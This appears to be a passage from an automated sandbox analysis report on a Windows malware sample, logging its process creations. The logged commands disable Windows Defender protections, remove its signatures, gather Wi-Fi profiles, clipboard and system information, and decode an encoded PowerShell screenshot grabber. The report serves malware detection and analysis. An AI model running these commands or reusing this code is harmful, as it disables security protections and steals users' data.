              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1EC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6FB1EC44C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1EBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6FB1EBBC0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1F9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6FB1F9924
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1EC62C SetUnhandledExceptionFilter,0_2_00007FF6FB1EC62C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1EC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF6FB1EC44C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1EBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF6FB1EBBC0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1F9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF6FB1F9924
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1EC62C SetUnhandledExceptionFilter,1_2_00007FF6FB1EC62C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEE30D8 IsProcessorFeaturePresent,00007FFE126E19A0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE126E19A0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFAEE30D8
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB005A1F IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFB005A1F
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B54C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,65_2_00007FF629B54C10
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B4B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,65_2_00007FF629B4B52C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B4B6D8 SetUnhandledExceptionFilter,65_2_00007FF629B4B6D8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B4A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,65_2_00007FF629B4A66C

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'Jump to behavior
              Bypasses PowerShell execution policy
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Encrypted powershell cmdline option found
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Modifies Windows Defender protection settings
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Removes signatures from Windows Defender
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Users\user\Desktop\e45AiBoV6X.exe "C:\Users\user\Desktop\e45AiBoV6X.exe"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0A